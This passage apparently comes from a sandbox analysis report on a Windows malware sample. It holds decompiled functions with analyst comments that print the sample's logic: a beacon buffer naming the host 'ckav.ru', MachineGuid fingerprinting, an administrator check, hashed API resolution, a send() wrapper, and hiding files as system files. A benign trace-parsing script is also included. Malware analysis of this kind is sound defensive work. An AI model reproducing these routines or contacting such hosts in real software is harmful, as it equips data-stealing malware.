                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                  • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreatePointerWrite
                                  • String ID:
                                  • API String ID: 3672724799-0
                                  • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                  • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                  • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                  • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 34%
                                  			E00412D31(void* __ecx, void* __edi) {
                                  				long _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				char _v40;
                                  				void* __ebx;
                                  				intOrPtr* _t10;
                                  				void* _t11;
                                  				void* _t25;
                                  				void* _t26;
                                  				void* _t27;
                                  				void* _t35;
                                  				void* _t53;
                                  				char* _t57;
                                  				void* _t58;
                                  				void* _t61;
                                  				void* _t64;
                                  				void* _t65;
                                  				intOrPtr* _t66;
                                  				void* _t67;
                                  				void* _t68;
                                  				void* _t69;
                                  				void* _t70;
                                  				void* _t71;
                                  				void* _t72;
                                  				void* _t73;
                                  
                                  				_t53 = __ecx;
                                  				_t10 =  *0x49fde0;
                                  				_t68 = _t67 - 0x24;
                                  				 *0x49fddc = 0x927c0;
                                  				 *0x49fde4 = 0;
                                  				_t75 = _t10;
                                  				if(_t10 != 0) {
                                  					L16:
                                  					_push(1);
                                  					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                                  					_t61 = _t11;
                                  					_t68 = _t68 + 0xc;
                                  					if(_t61 != 0) {
                                  						E004031E5(0, 0, 0xfcae4162, 0, 0);
                                  						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                                  					}
                                  					L004067C4(0xea60); // executed
                                  					_pop(_t53);
                                  				} else {
                                  					_push(__edi);
                                  					 *0x49fde0 = E004056BF(0x2bc);
                                  					E00413DB7(_t53, _t75,  &_v40);
                                  					_t57 =  &_v24;
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					E004058D4( *0x49fde0, 0x12);
                                  					E004058D4( *0x49fde0, 0x28);
                                  					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                                  					_t69 = _t68 + 0x28;
                                  					_t64 = E0040632F();
                                  					_push(0);
                                  					_push(1);
                                  					if(_t64 == 0) {
                                  						_push(0);
                                  						_push( *0x49fde0);
                                  						E00405872();
                                  						_t70 = _t69 + 0x10;
                                  					} else {
                                  						_push(_t64);
                                  						_push( *0x49fde0);
                                  						E00405872();
                                  						E00402BAB(_t64);
                                  						_t70 = _t69 + 0x14;
                                  					}
                                  					_t58 = E00406130(_t57);
                                  					_push(0);
                                  					_push(1);
                                  					_t77 = _t64;
                                  					if(_t64 == 0) {
                                  						_push(0);
                                  						_push( *0x49fde0);
                                  						_t25 = E00405872();
                                  						_t71 = _t70 + 0x10; // executed
                                  					} else {
                                  						_push(_t58);
                                  						_push( *0x49fde0);
                                  						E00405872();
                                  						_t25 = E00402BAB(_t58);
                                  						_t71 = _t70 + 0x14;
                                  					}
                                  					_t26 = E004061C3(_t25, 0, _t77); // executed
                                  					_t65 = _t26;
                                  					_push(0);
                                  					_push(1);
                                  					if(_t65 == 0) {
                                  						_push(0);
                                  						_push( *0x49fde0);
                                  						_t27 = E00405872();
                                  						_t72 = _t71 + 0x10;
                                  					} else {
                                  						_push(_t65);
                                  						_push( *0x49fde0);
                                  						E00405872();
                                  						_t27 = E00402BAB(_t65);
                                  						_t72 = _t71 + 0x14;
                                  					}
                                  					_t66 = E00406189(_t27);
                                  					_t79 = _t66;
                                  					if(_t66 == 0) {
                                  						E00405781( *0x49fde0, 0);
                                  						E00405781( *0x49fde0, 0);
                                  						_t73 = _t72 + 0x10;
                                  					} else {
                                  						E00405781( *0x49fde0,  *_t66);
                                  						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                                  						E00402BAB(_t66);
                                  						_t73 = _t72 + 0x14;
                                  					}
                                  					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                                  					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                                  					_t35 = E0040642C(_t79); // executed
                                  					E004058D4( *0x49fde0, _t35);
                                  					E004058D4( *0x49fde0, _v24);
                                  					E004058D4( *0x49fde0, _v20);
                                  					E004058D4( *0x49fde0, _v16);
                                  					E004058D4( *0x49fde0, _v12);
                                  					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                                  					_t68 = _t73 + 0x48;
                                  				}
                                  				_t80 =  *0x49fde4;
                                  				if( *0x49fde4 == 0) {
                                  					_t10 =  *0x49fde0;
                                  					goto L16;
                                  				}
                                  				return E00405695(_t53,  *0x49fde0);
                                  			}

                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                    • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                    • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$CreateFreeProcessThread_wmemset
                                  • String ID: ckav.ru
                                  • API String ID: 2915393847-2696028687
                                  • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                  • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                  • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                  • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040632F() {
                                  				char _v8;
                                  				void* _t4;
                                  				void* _t7;
                                  				void* _t16;
                                  
                                  				_t16 = E00402B7C(0x208);
                                  				if(_t16 == 0) {
                                  					L4:
                                  					_t4 = 0;
                                  				} else {
                                  					E0040338C(_t16, 0, 0x104);
                                  					_t1 =  &_v8; // 0x4143e8
                                  					_v8 = 0x208;
                                  					_t7 = E00406069(_t16, _t1); // executed
                                  					if(_t7 == 0) {
                                  						E00402BAB(_t16);
                                  						goto L4;
                                  					} else {
                                  						_t4 = _t16;
                                  					}
                                  				}
                                  				return _t4;
                                  			}

                                  APIs
                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                  • _wmemset.LIBCMT ref: 0040634F
                                    • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser_wmemset
                                  • String ID: CA
                                  • API String ID: 2078537776-1052703068
                                  • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                  • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                  • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                  • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                                  				int _t7;
                                  				void* _t8;
                                  
                                  				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                                  				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                                  				return _t7;
                                  			}

                                  APIs
                                  • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InformationToken
                                  • String ID: IDA
                                  • API String ID: 4114910276-365204570
                                  • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                  • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                  • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                  • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                                  				_Unknown_base(*)()* _t5;
                                  				void* _t6;
                                  
                                  				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                                  				_t1 =  &_a8; // 0x403173
                                  				_t5 = GetProcAddress(_a4,  *_t1); // executed
                                  				return _t5;
                                  			}

                                  APIs
                                  • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID: s1@
                                  • API String ID: 190572456-427247929
                                  • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                  • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                  • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                  • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			/* Reads a registry value into a freshly allocated 0x208-byte buffer and returns the
                                  			   buffer (the caller owns it) or 0 on failure.  E004031E5(_, module, hash, 0, 0) is the
                                  			   sample's run-time API resolver: in the listings on this page the second argument
                                  			   selects the DLL (9 for the advapi32 registry functions, 0 for the kernel32 ones,
                                  			   2 for shlwapi's PathFileExistsW) and the third is a hash of the export name, so none
                                  			   of these APIs show up in the import table.  The access mask 0x20119 is
                                  			   KEY_READ | KEY_WOW64_64KEY, i.e. the native 64-bit view of the key is read even
                                  			   from a 32-bit process.  The API trace below shows "MachineGuid" among the stack
                                  			   arguments; that value lives under HKLM\SOFTWARE\Microsoft\Cryptography and is a
                                  			   common per-host fingerprint (the key path itself is not in the trace). */
                                  			E00404A52(void* _a4, char* _a8, char* _a12) {
                                  				void* _v8;
                                  				int _v12;
                                  				void* __ebx;
                                  				char* _t10;
                                  				long _t13;
                                  				char* _t27;
                                  
                                  				_push(_t21);
                                  				_t27 = E00402B7C(0x208); // heap allocation (GetProcessHeap + RtlAllocateHeap, see the subcall lines below)
                                  				if(_t27 == 0) {
                                  					L4:
                                  					_t10 = 0;
                                  				} else {
                                  					E00402B4E(_t27, 0, 0x208); // zero the buffer
                                  					_v12 = 0x208;              // cbData in/out parameter for RegQueryValueExA
                                  					E004031E5(0, 9, 0xf4b4acdc, 0, 0); // resolves RegOpenKeyExA
                                  					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                                  					if(_t13 != 0) {
                                  						E00402BAB(_t27); // presumably the matching heap free
                                  						goto L4;
                                  					} else {
                                  						E004031E5(0, 9, 0xfe9f661a, 0, 0); // resolves RegQueryValueExA
                                  						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed; the return value is not checked
                                  						E00404A39(_v8); // executed; RegCloseKey wrapper (E004049FF further down is reached from 00404A44)
                                  						_t10 = _t27;
                                  					}
                                  				}
                                  				return _t10;
                                  			}

                                  APIs
                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                  • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                  • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 1425999871-0
                                  • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                  • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                  • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                  • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%
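The "APIs" lists in these listings share one line format: a bullet, an optional "Part of subcall function ADDR:" prefix, then Name.MODULE(args), ref: ADDR, where each argument is a raw 8-hex-digit stack value, "?" when the sandbox could not read it, or a string it recovered (such as the "MachineGuid" value name above). The parser below is an added example, not code from the report or from the analysed sample; it turns those lines into records so that the access mask, the hash passed to the resolver and the recovered strings can be pulled out mechanically. The sample lines are copied from this page; reading every 8-hex-digit token as an integer is this parser's own assumption, since the trace does not type its arguments.

```python
"""Parse the "APIs" trace lines of a sandbox function listing into records.

Added example, not part of the report or of the analysed sample.  The line
format is the one used under "APIs" above:
    • Name.MODULE(arg,arg,...), ref: ADDR
    • Part of subcall function ADDR: Name.MODULE(arg,...), ref: ADDR
Reading every 8-hex-digit token as an integer is this parser's assumption;
the trace itself does not type its arguments.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w#@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str                        # DLL the call resolved into (KERNELBASE, WS2_32, ...)
    ref: int                           # address of the call instruction inside the sample
    args: List[object]                 # int (raw stack DWORD), str (recovered literal) or None ('?')
    subcall_of: Optional[int] = None   # set for "Part of subcall function" lines


def parse_arg(token: str):
    """'?' -> None, 8 hex digits -> int, anything else -> the literal the sandbox recovered."""
    token = token.strip()
    if token == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None                    # headings such as "Memory Dump Source"
    raw = m["args"].strip()
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    return ApiCall(
        api=m["api"],
        module=m["module"],
        ref=int(m["ref"], 16),
        args=args,
        subcall_of=int(m["sub"], 16) if m["sub"] else None,
    )


def parse_trace(text: str) -> List[ApiCall]:
    return [c for c in (parse_line(l) for l in text.splitlines()) if c is not None]


def string_arguments(calls: List[ApiCall]) -> List[str]:
    """Literal strings the sandbox recovered from the stack, e.g. a registry value name."""
    return sorted({a for c in calls for a in c.args if isinstance(a, str)})


def calls_by_module(calls: List[ApiCall]) -> dict:
    """Which APIs were reached in which DLL; useful to spot the hash-resolved ones."""
    out = {}
    for c in calls:
        out.setdefault(c.module, set()).add(c.api)
    return out


# Sample input: lines copied from the "APIs" sections of this report.
SAMPLE = """\
  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
• RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
• RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
• send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
• WSAStartup.WS2_32(00000202,?), ref: 00404E08
Memory Dump Source
"""

if __name__ == "__main__":
    calls = parse_trace(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X} {c.module}!{c.api} args={c.args}")
    print("strings:", string_arguments(calls))
    print("by module:", calls_by_module(calls))
```

Once the lines are records, the RegOpenKeyExA call's fourth argument reads directly as 0x20119 and the ninth as "MachineGuid", and the same records can be grouped per DLL to see which functions the sample reached without importing them.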

                                  C-Code - Quality: 40%
                                  			/* "Is the current token a member of BUILTIN\Administrators?"  _v20 (4 zero bytes)
                                  			   followed by _v16 (0x0500, stored little-endian) is the 6-byte
                                  			   SID_IDENTIFIER_AUTHORITY 00 00 00 00 00 05 = SECURITY_NT_AUTHORITY.  The
                                  			   11-argument call through the first resolved pointer has the shape of
                                  			   AllocateAndInitializeSid(&auth, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, &sid), with
                                  			   0x20 = SECURITY_BUILTIN_DOMAIN_RID and 0x220 = DOMAIN_ALIAS_RID_ADMINS, i.e.
                                  			   S-1-5-32-544.  Only the second call (CheckTokenMembership) is named in the trace,
                                  			   so the first API is inferred from its argument pattern.  E0040604F(_v12) then
                                  			   releases the SID.  The "sbb eax, eax" / and-not sequence keeps IsMember only when
                                  			   CheckTokenMembership itself succeeded, so a failed call reads as "not admin". */
                                  			E004060BD(void* __eflags) {
                                  				signed int _v8;   // IsMember out-parameter, also the return value
                                  				char _v12;        // PSID
                                  				short _v16;       // high WORD of the identifier authority (0x0500)
                                  				char _v20;        // low DWORD of the identifier authority (0)
                                  				void* __ebx;
                                  				intOrPtr* _t12;
                                  				signed int _t13;
                                  				intOrPtr* _t14;
                                  				signed int _t15;
                                  				void* _t24;
                                  
                                  				_v16 = 0x500;
                                  				_v20 = 0;
                                  				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0); // advapi32 export resolved by hash
                                  				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12); // AllocateAndInitializeSid pattern
                                  				_v8 = _t13;
                                  				if(_t13 != 0) {
                                  					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0); // resolves CheckTokenMembership
                                  					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed: CheckTokenMembership(NULL, sid, &IsMember)
                                  					asm("sbb eax, eax");
                                  					_v8 = _v8 &  ~_t15;
                                  					E0040604F(_v12); // FreeSid
                                  					return _v8;
                                  				}
                                  				return _t13;
                                  			}

                                  APIs
                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CheckMembershipToken
                                  • String ID:
                                  • API String ID: 1351025785-0
                                  • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                  • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                  • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                  • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			/* Ensure a directory exists.  E00403D4D tests the path first (the GetFileAttributesW
                                  			   trace further down shows it reached via 00403D58 <- 00403C6D, i.e. from here) and
                                  			   CreateDirectoryW is called only when that test fails.  Returns 1 if the directory
                                  			   was already present, otherwise the CreateDirectoryW result. */
                                  			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                                  				void* _t3;
                                  				int _t5;
                                  
                                  				_t3 = E00403D4D(__eflags, _a4); // executed; exists-check built on GetFileAttributesW
                                  				if(_t3 == 0) {
                                  					__eflags = 0;
                                  					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0); // resolves CreateDirectoryW (kernel32)
                                  					_t5 = CreateDirectoryW(_a4, 0); // executed
                                  					return _t5;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                  • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                  • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                  • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			/* Returns 1 when the underlying OS is 64-bit x64.  _v40 is the first WORD of the
                                  			   SYSTEM_INFO that GetNativeSystemInfo fills (wProcessorArchitecture) and 9 is
                                  			   PROCESSOR_ARCHITECTURE_AMD64.  GetNativeSystemInfo, unlike GetSystemInfo, reports
                                  			   the real architecture even when the caller runs under WOW64. */
                                  			E0040642C(void* __eflags) {
                                  				short _v40;   // start of the SYSTEM_INFO structure (36 bytes)
                                  				intOrPtr* _t6;
                                  				void* _t10;
                                  
                                  				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0); // resolves GetNativeSystemInfo
                                  				 *_t6( &_v40); // executed
                                  				return 0 | _v40 == 0x00000009; // wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64
                                  			}

                                  APIs
                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InfoNativeSystem
                                  • String ID:
                                  • API String ID: 1721193555-0
                                  • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                  • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                  • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                  • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			/* send() wrapper: WS2_32 ordinal 19 is send, as the trace confirms.  When no length is
                                  			   supplied (_a12 == 0) the length becomes strlen(buffer) + 1, so the terminating NUL
                                  			   is transmitted along with the string; E00405D0B is presumably the string-length
                                  			   routine.  Returns the length that was requested, not the send() result. */
                                  			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                  				intOrPtr _t5;
                                  
                                  				_t5 = _a12;
                                  				if(_t5 == 0) {
                                  					_t5 = E00405D0B(_a8) + 1;
                                  				}
                                  				__imp__#19(_a4, _a8, _t5, 0); // executed: send(socket, buffer, length, 0)
                                  				return _t5;
                                  			}

                                  APIs
                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                  • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                  • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                  • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                                  				int _t6;
                                  				void* _t7;
                                  
                                  				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                                  				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                                  				return _t6;
                                  			}

                                  APIs
                                  • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileMove
                                  • String ID:
                                  • API String ID: 3562171763-0
                                  • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                  • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                  • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                  • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                  • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                  • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                  • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			/* SetFileAttributesW(path, 0x2006): FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM |
                                  			   FILE_ATTRIBUTE_NOT_CONTENT_INDEXED.  A hidden+system file is not shown by Explorer
                                  			   with default settings and is skipped by Windows Search indexing, a common way to
                                  			   keep a dropped copy out of sight. */
                                  			E0040427D(WCHAR* _a4) {
                                  				int _t4;
                                  				void* _t5;
                                  
                                  				E004031E5(_t5, 0, 0xcac5886e, 0, 0); // resolves SetFileAttributesW (kernel32)
